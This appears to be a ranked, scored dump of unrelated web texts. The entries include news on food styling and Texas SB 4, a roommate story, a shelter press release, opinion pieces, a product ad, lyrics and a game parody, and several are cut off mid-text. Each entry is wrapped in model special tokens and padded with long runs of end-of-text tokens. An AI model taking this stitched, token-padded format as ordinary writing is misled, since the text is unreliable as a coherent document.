+<|begin_of_text|>While working with Burger King, Adar said he's even had to sign a legal document saying he didn't alter anything. Chick-fil-A demanded that he use its procedures. + +"Most companies today want it to be fresh, natural, not overworked," Adar said. + +McDonald's, Burger King, Starbucks, Chipotle and Yum Brands didn't respond to CNBC email requests for comment about the practice of food styling. A Chick-fil-A spokeswoman said the company isn't sure it would "be a fit for this story" since it takes a different approach to using food in its commercials, which often center on cows advising people to 'eat mor chikin.' + +A Wendy's spokesman said about food stylists, "We supply the same ingredients to them as our restaurants receive. We also require that they prepare and build the products to operational procedures. The big difference is how much time we take to get an appealing shot." + +In a statement, Dunkin' Donuts Spokeswoman Michelle King said, "Dunkin' Donuts always uses real Dunkin' Donuts product in our advertisements. Our shoot director and food stylist team build the products to the exact specifications provided by Dunkin' Donuts' chefs to match what will be sold in our restaurants. We strive to ensure the authenticity of our products in our advertising." + +On the regulatory side, Federal Trade Commission spokeswoman Betsy Lordan told CNBC by email that truth in advertising laws do apply to restaurant menu items displayed in ads. The commission examines both what's implied by and stated in an ad to determine whether it's deceptive. + +"There are no specific FTC regulations governing food photos used in advertising, and the FTC has not pursued any cases alleging that food ads are deceptive based only on the photos," she wrote. + +If, for example, customers see that McDonald's fries look different in person than in an ad, that would not cause the same regulatory concern as a false claim that a product has special properties, like reducing the risk of illness.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 39; Score = 876544.0 +<|begin_of_text|>I was fast asleep when suddenly I was awoken by a pounding on the door. This was not a knock like, “Hey, what’s up?” or even, “I really need to talk to you.” This was a knock that said, “I am going to get in there, and when I do, it’s gonna suck to be you.” The person outside the door was screaming for my roommate. I looked over to him. + +"Don't open the door!" + +I asked who it was. + +"Just don't open the door." + +I've never been so terrified in my life. + +My roommate called the cops, but it took a while for them to get there. The knocking stopped—a ploy. We could still see the shadow of two feet under the door. He stood out there, stark still and silent. Then the knob started to slowly turn. He was trying to get in. A few minutes before the cops arrived, he left. Honestly, that night had been coming + +a long time. + +When I first met my roommate freshman year, I was cautiously optimistic. He seemed nice enough. I thought I could chill with him, even after he starting talking about drugs the first week of class. I had never done any. The first time he had ever smoked weed was during senior week, and he began to smoke more regularly over the summer. When I met him he smoked twice a week. + +Eventually, he was smoking almost every night out the window of the men’s bathroom. He would come back giggling and stay up all night playing online poker. He also experimented with other substances, like Adderall—to help him stay awake for gambling and more weed. + +He and his buddies would even strangle each other to the point of passing out to get high off the oxygen deprivation. I’m not exactly sure when he started dealing. + +He would get visits from strange girls, beautiful girls who he would bang that night then never see again. Most of them brought little gifts: cigarettes, teddy bears, etc. I thought he just had serious game. + +During the third month of school I talked to the resident assistant (RA) and, without naming specifics, told him that I was very uncomfortable with my roommate. My RA told me my only recourse was to file a formal complaint, but my roommate was popular on the floor. I didn’t want to be the one getting him thrown out. Not to mention the paperwork; finals were coming up. + +Then, one night, early in the spring semester, he and his buddies were in +================================================================================ +Rank = 40; Score = 864256.0 +<|begin_of_text|>There's no excuse for skipping out on fruits and veggies: The freezer aisle is full of 'em. Even if your favorite produce items are out of season, icy storage makes for freezing to fresh deliciousness almost as soon as you realize you're hungry. + +But you may be wondering, are those frozen veggies as good as the fresh ones? New research says yes, if not better. + +According to a study to be published in the June 2017 issue of the Journal of Food Composition and Analysis, some frozen fruits and vegetables may retain nutrients better than their fresh, refrigerated counterparts. + +Jean-Francois Monier/Getty Images A bear enjoys some frozen broccoli. + +"When considering the refrigerated storage to which consumers may expose their fresh produce prior to consumption, the findings of this study do not support the common belief of consumers that fresh food has significantly greater nutritional value than its frozen counterpart," the study, which was conducted by researchers from the University of Georgia in partnership with the Frozen Food Foundation — which has an obvious interest in promoting frozen foods — concluded. + +The two-year-long study looked at the storage of blueberries, strawberries, corn, broccoli, cauliflower, green beans, green peas and spinach, analyzing their nutrients on the day of purchase, five days after being stored in the refrigerator and in frozen form. + +"Our research shows that frozen fruits and vegetables are nutritionally equal to — and, in some cases, better than — their fresh-stored counterparts," UGA professor Dr. Ronald Pegg said in a news release. "In particular, Vitamin A was greater in frozen fruits and vegetables than select fresh-stored fruits and vegetables." + +How does freezing keep the nutrients in? + +A technique called fresh freezing, which freezes the vegetables as soon as they're ready instead of letting them sit on a truck or crate before being unpacked at a grocery store and then toted home, is what locks in those nutrients. + +"Frozen vegetables are usually nutritionally equivalent to fresh vegetables because they're generally flash-frozen onsite, immediately after harvest," registered dietitian Emily Braaten, explained via email. "This kind of 'processing' may degrade some nutrients while making others more bioavailable." + +Are we gaining enough nutrients to compensate for what we're losing in the freezing process? + +"These changes are [insignificant] to the average consumer," Braaten said. "The important thing is to increase your intake of vegetables, regardless of the source." + +So, should you switch from fresh to frozen? + +Skipping over those blanket-like hydroponic lettuce leaves and red, juicy summer strawberries +================================================================================ +Rank = 41; Score = 864256.0 +<|begin_of_text|>October 8, 2015 • + +by Marketing • Posted in: Press Releases + +Austin Pets Alive! promotes the safety of humans and of our animals. + +Neville was taken into Austin Pets Alive!’s rescue program a few months ago. Neville is a young, friendly dog who has never shown any signs of aggression. On September 22, Neville was playing with other dogs in a play yard when a family entered the yard to visit the dogs. The parents were advised by a staff member not to put their small son on the ground, because the dogs were playing energetically and a toddler could easily be accidentally knocked over. However, the child was placed on the ground and allowed to grab Neville, who unfortunately bit the child. + +It is a very unfortunate situation for everyone, as we would never want a child to be harmed. However, we believe this was entirely preventable had our staff’s instructions and common sense been followed. + +The family pleaded to the court system to have the dog killed, and Municipal Court Judge Clervi issued an order that Neville be killed, despite the evidence we presented. + +“We don’t believe this is a dangerous dog,” said Mike Kaviani, APA!’s Dog Behavior Team manager. ”He did not seek out the child to bite, he was simply reacting to the child who cornered him. We haven’t been given any options at all other than killing the dog or we would be taking them. We are saddened and outraged we were not given an opportunity to find a better outcome for Neville.” + +“Dogs can’t speak to us and tell us they don’t like something we are doing,” said Kaviani “They have limited ways to communicate and it’s our job to understand that.”<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 42; Score = 860160.0 +<|begin_of_text|>Posted 6 years ago on Sept. 23, 2012, 4:08 p.m. EST by OccupyWallSt + +Tags: police, s17, bloomberg, nyc + +The first anniversary of Occupy Wall Street was a joyous affair for the 99%. + +Yet regrettably, it was also a day that illustrated how Mayor Michael Bloomberg’s ‘private army’ has been increasingly unleashed to beat, arrest, imprison, and broadly suppress OWS. + +Please post your videos, photos, and stories about how your rights were infringed on the Occupy Bloomberg’s Army Facebook page. + +Occupy is a nonviolent movement, but this has not prevented Bloomberg’s Army from engaging in targeted arrests of specific organizers as well as random street ‘snatch and release’ intimidation tactics. + +On September 17th not even the constant drone of helicopters overhead could drown out the screams of ‘I’m a journalist’ from the reporters who were arrested merely for practicing their and our right to freedom of the press. + +And not even a cry of ‘I’m a City Councilmember’ was enough to staunch the established policy of brutality within the Mayor of Wall Street’s Police Department. + +The message being sent by Bloomberg’s Army is being heard loud and clear. In Bloomberg’s New York: anyone who supports Occupy Wall Street in any fashion is being made an example of. + +Were you one of these people extra-legally arrested or assaulted, or have you witnessed someone who was? + +Post your videos, photos, and stories on the Occupy Bloomberg’s Army Facebook page. + +We will not be stymied by the over 180 arrests on our anniversary, nor intimidated by the unprovoked and random nature of so many of them. + +We will fight for our right to protest Wall Street while we protest Wall Street itself. + +All Roads Lead To Wall Street + +-- from the ‘Your Inbox: Occupied’ team (click here to subscribe)<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 43; Score = 860160.0 +<|begin_of_text|>The Republican lawmaker’s call to ICE will “almost assuredly” be used to show ‘discriminatory intent,’ an attorney said. + +A Texas lawmaker’s decision to report protesters to immigration police Monday could come back to haunt the state when it defends the law in court, an attorney involved in the case said Thursday. + +On Monday, Representative Matt Rinaldi, R-Irving, called Immigration and Customs Enforcement (ICE) after hundreds of mostly Latino activists filled the House gallery to protest Senate Bill 4, the controversial ‘sanctuary cities’ ban. + +Jose Garza, an attorney representing El Paso County in its suit against SB 4, told the Observer that the incident will “almost assuredly” be used to help establish in court that the Texas Legislature passed the law with “discriminatory intent.” + +“This was a peaceful protest and many were citizens,” Garza said, “and Rinaldi sicced ICE on them because they were brown.” + +Rinaldi, a member of the far-right House Freedom Caucus and an outspoken supporter of SB 4, said in a statement on Monday that he called ICE after seeing signs that read “I am illegal.” After several people, including Democratic lawmakers, said there was no evidence of those signs, Rinaldi clarified in a radio interview Thursday that the signs read “undocumented and unafraid” and “undocumented and here to stay.” + +El Paso County and the City of El Cenizo have both sued the state over SB 4, and Austin and San Antonio have announced plans to take legal action as well. Texas Attorney General Ken Paxton pre-emptively filed his own lawsuit, which he hopes will lead to a judge declaring the law constitutional, shortly after Governor Greg Abbott signed SB 4 into law. + +SB 4 is set to go into effect September 1. Opponents hope a federal injunction will halt the measure before that date. Proving “discriminatory intent” in the lawmaking process is part of their legal strategy. + +Thanks to an amendment by Rinaldi’s fellow House Freedom Caucus member Matt Schaefer, SB 4 will allow police to ask people who’ve been detained — not just arrested — about their immigration status. The law also threatens to jail law enforcement officials who limit cooperation with federal immigration agents. + +Rinaldi’s call to ICE Monday nearly prompted a fistfight on the House floor. Representative Ramon Romero Jr. said Rinaldi’s call to ICE demonstrates how the law licenses discrimination. + +“[Rinaldi] +================================================================================ +Rank = 44; Score = 843776.0 +<|begin_of_text|>I am hooked on Slime Rancher! After playing stressful first person shooters that make my heart beat a million times a minute I needed a more relaxing (not boring!) game. I came across Slime Rancher, and tried the free demo before quickly purchasing the game. Not only is this a relaxing game, but it’s incredibly engaging and fun! After playing for a day here are six things I wish I knew before starting Slime Rancher. + +1. That the “ocean” is not really water. It’s the rotting corpses of millions of cute slimes. Sorry to ruin that pristine ocean view for you. + +2. The massive Slimes (i.e. Gordo) are not bosses to be killed, but super hungry Slimes that want to EAT. Feed those suckers, because when their belly gets too full they’ll die of happiness and trust me, it’s a win-win for everyone. + +3. You can upgrade your corral with a plot collector. This upgrade will suck out all the plorts in your corral and store them in a container on the corner of the corral. I don’t know why this took me so long, but you must use your vac to suck the plorts out of the storage. I’m probably just an idiot, but I wish I had known how to do this before I spent five minutes trying every other button on my keyboard. + +4. These scary nightmare slimes are called Tarr, and good news! They can be defeated. There’s special eery music that accompanies the Tarr and my first encounter with them was frightening. They stretch out arms and eat all the other slimes in the area! They’re incredibly hostile, and will attack on sight. They reminded me of the “nothing” from The Neverending Story novel. When I began Slime Rancher I would run away from the Tarr whenever I saw them, but now I know they can be combated. + +Chuck them into the “ocean” (remember what it really is!) + +Purchase an incinerator for a plot on your ranch and toast those suckers. + +Spray them with water that you get from geysers or ponds. + +Toss them into a pond. + +5. Slimes can’t die from starvation, but they’ll be very upset and hungry! You don’t want your slimes to be upset do you? + +6. The big question I had as I explored was – What Happens When I Die? I did not want to test the theory, but +================================================================================ +Rank = 45; Score = 839680.0 +<|begin_of_text|>Just an inch away from your face I am staring into your eyes You would be surprised if you could see What's an inch from your face But it's impossible I am invisible + +Tiptoeing and holding my breath Almost knocking over a lamp Barely able to contain a sneeze I am invisible I am invisible I am invisible + +Did you notice something? Was there somebody there? No, apparently not There you felt it again Something creeping around That you can't see + +Doing jumping jacks in the bank Dancing through the supermarket Spinning in the courtroom on one leg I am invisible I am invisible I am invisible + +There are details That I haven't worked out Like when I eat my lunch Does it disappear Or do you see it going all the way down? + +Did the cat just learn how to fly? No, I'm only holding him up Did the cat turn on the dishwasher? No, I'm holding his paw Pushing down on the switch Making it look like he's Doing it by himself Cause I'm invisible I am invisible I am invisible<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 46; Score = 831488.0 +<|begin_of_text|>Although I have been a so-called ‘black’ American and a social conservative all my life – and found the two aspects of my identity to be remarkably congruent – I am always surprised when confronted with some of the vitriol that I and my fellow black conservatives face when addressing the black community. I have often wondered why it is ok for other groups to maintain a diversity of political viewpoints – whether they are Asians, Latinos, or Jewish Americans – but black Americans seem to believe that anyone who does not vote the party line is a traitor to his or her race. + +Why is it that among African Americans anyone who does not support the Democrats or liberal causes is labeled a sell-out, or a ‘self-loathing’ black person? Are we not as diverse in our thinking as other groups? We should really avoid chastising each-other for thinking differently. Instead we should appreciate and celebrate our wonderfully diverse community. We should welcome diverse perspectives as an asset, not a liability. The more we do this, the faster we will grow as a community and attain mainstream success in America. + +Case in point; many were quick to chastise the pastors who opened the door for Donald Trump’s message to the black community; but where are those same people when it comes time to chastising the murderers in Chicago that are killing people? When it comes to Donald Trump though, it seems there is a special kind of disrespect. People hate Trump so much – and by default some of his black surrogates – that the discussion gets overheated before we even get a chance to discuss the issues. Now, I’m not going to pretend that Trump hasn’t been a magnate for controversy, whether intentionally or not, but surely we don’t all have to lose our heads just because something outrageous that might have been said by a candidate on the campaign trail. + +Since when has merely having a conversation become a prohibited act? The attitude in some parts of the black community seems to be, ‘I can’t even talk to you because I can’t understand how you can support Trump.’ But for business-people and others within the black community, we look at a guy like Donald Trump and we see an opportunity. Perhaps Trump’s not a perfect guy – who is? – but surely we can have a conversation about the things we have in common. + +For example, what about Obamacare? I own businesses with over a hundred employees. Obamacare has increased the overhead costs for health coverage significantly in my company. It has reduced the number of people (including African Americans) that I can +================================================================================ +Rank = 47; Score = 819200.0 +<|begin_of_text|>The ultra-compact TelePen is a handy collapsible pen that attaches to your keychain. Weighing less than an ounce and measuring less than two inches, you'll hardly notice the diminutive telescoping pen dangling from your keyring. But the TelePen is there when you need it, expanding to nearly the length of a standard pen. Its tough stainless steel exterior protects it from the elements. Includes three black ink refills. + +Attach it to your keyring and you'll always have a pen + +Searching for a pen in a hurry is frustrating. The TelePen mini telescoping pen attaches to your keychain so you'll never again be without a pen. + +You may be thinking, "But I have a fancy mobile phone. It has an app for making me sound like T-Pain, so surely I don't need old technology like a pen!" As awesome as "I am T-Pain" is, you are wrong about not needing a pen. There is no faster way to jot down a note than with a trusty pen. + +Imagine the following scenario: You're talking on said mobile device and your wife is giving you a list of groceries to pick up. Are you going to grab yet another cell phone and fire up its note-taking function in order to write down the list? Surely not because you have the TelePen Telescoping Pen on your keychain! + +Simply push or pull to collapse or expand + +Push or pull the TelePen to shrink or expand the telescoping tubes. When fully extended, give it a sharp tug to remove the pen from the keyring holder. + +The tough TelePen can handle abuse + +Your keychain lives a rough life. Tossed around your house, buried in purses, pockets, and jackets; there's a reason why keys are made from metal. Thankfully, the TelePen can handle its fair share of abuse due to its stainless steel construction. + +Expands from the size of a key to a nearly full-size pen + +When collapsed, the TelePen is a hair under two inches long making it about the size of a standard house key. When expanded, it's nearly the length of a full-size pen. + +With the TelePen, you're not going to feel like you're using one of those miniature golf course pencils. + +Includes three black ink refills + +In addition to the keyring (which is included), each TelePen includes three black ink refills.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 48; Score = 819200.0 +<|begin_of_text|>© Raghu Rai / Magnum Photos + +The doctor whose hands were tied + +Dr D.K. Satpathy, aged 66, sits below a painting of what looks like his younger self surrounded by flying doves. He is relaxed, animated, but becomes increasingly emotional as he recalls that fateful night, 30 years ago, when Bhopal became the site of one of the world’s worst industrial disasters. + +From 2 to 3 December 1984, about 24 metric tonnes of methyl isocyanate (MIC), a highly volatile and deadly gas, escaped from the US-controlled Union Carbide pesticide plant in Bhopal. Thousands of people were living in shanty towns nearby. + +Like many of those people, Dr Satpathy was asleep when it happened. “Suddenly, at 4am, my professor comes to my home,” he recalls. “He is shouting at me to rush to the mortuary as fast as possible.” + +Dr Satpathy, a pathologist and former head of the state Medico-Legal Institute, immediately ran to Hamidia Hospital. As he approached, he found the road was full of people. + +“I saw thousands of people lying there. Some were wailing, some were gasping, some were crying. I couldn’t understand what was happening.” + +Mass cremation of victims held beside communal graves within days of the gas leak, 5 December 1984. © Raghu Rai / Magnum Photos + +As patients died around him, Dr Satpathy and his colleagues struggled to find a way to treat them. One doctor rang up a medical official at Union Carbide hoping to find out more. The official’s response, recalls Dr Satpathy, was that the accident had “something to do with… carbon monoxide” and that it was “not a serious matter”. His advice was to “put a wet cloth in their mouth and they will get well.” + +Shocked by this, Dr Satpathy, too, appealed to the Union Carbide official: “I told him, ‘Sir, I am Dr Satpathy. I am your student speaking. You are a citizen of Bhopal. Union Carbide is from a foreign country and here my people are dying. If you know anything, please tell me, so that at least we shall be able to extend some medical treatment.’ He replied saying, ‘I am a citizen of Bhopal. The people who are dying are my brothers. If I knew anything, I would have definitely told you. +================================================================================ +Rank = 49; Score = 811008.0 +<|begin_of_text|>What?! When?! Why wasn't I warned?! + +She did not announce her visit. It seems she was in a hurry. + +God drat it! Close the gates! Lock all the doors! Release the moat sharks! + +She's already here, sire. + +Oh crap oh crap oh crap. Uh, tell her I'm out. + +No, tell her I'm dead! + +Sire. You misunderstand. + +She's here. + +Marthipan! + +hello sheeda + +I haven't seen you in aaaages! + +yeah good times + +Did you miss me? I missed you. + +yes sheeda + +We've got so much to catch up on! I can't wait! + +yes sheeda + +By the way, we're being attacked by pirates. + +yes sheeda + +Wait, what? + +Holy poo poo. + +Jeigan! + +Highness? + +Round up my posse. + +You do not have a "posse" that I am aware of. + +... + +Conscript me a posse. + +Right away, sire. + +Then round 'em up. + +Where's that old fart with my stupid posse? It's been like an hour. + +JEIGAN YOU ARE SLOW AS poo poo + +Wait, Jeigan's on a horse. + +YOUR HORSE IS SLOW AS poo poo + +JEIGAN + +I AM GONNA GET YOU A FASTER HORSE + +You know what? Forget the posse. I can handle this myself. I mean, who's the prince? Who got a gold star in fencing class? Who's a badass? + +... + +Jeigan! Come back here and confirm that I'm a badass! + +okay this isn't going to work actually + +You're so brave, Marthipan! + +SHEEDA + +Do your beeeest! + +loving HELP ME + +Ugh...everything's dark...can't move... + +Marth. + +Buh? + +Marth. Listen carefully. You can't let yourself get killed. You're a Lord. + +...I'm a prince. + +Yes, I know. But for the purposes of this story, you are a Lord. + +But I'm a prince. + +Whatever. The point is, you're important. If you die, it's all over. + +Everyone else can die, though. + +That's okay. + +Who are you? + +God. + +What's this? Grass? Wind? Sunlight?! + +Marth lives! + +I'm only doing this once. Don't gently caress it up again. + +... + +I am Jesus. + +I knew it! + +This is the posse, is it? + +The +================================================================================ +Rank = 50; Score = 802816.0 +<|begin_of_text|>Fuelling The Cycle Of Hate + +By Neve Gordon & Yigal Bronner + +27 January, 2009 + +Guardian.co.uk + +Israeli soccer matches were suspended during the assault on Gaza. When the games resumed last week, the fans had come up with a new chant: "Why have the schools in Gaza been shut down?" sang the crowd. "Because all the children were gunned down!" came the answer. + +Aside from its sheer barbarism, this chant reflects the widespread belief among Israeli Jews that Israel scored an impressive victory in Gaza – a victory measured, not least, by the death toll. + +Israeli pilots and tank commanders could not really discriminate between the adults and the children who hid in their homes or huddled in the 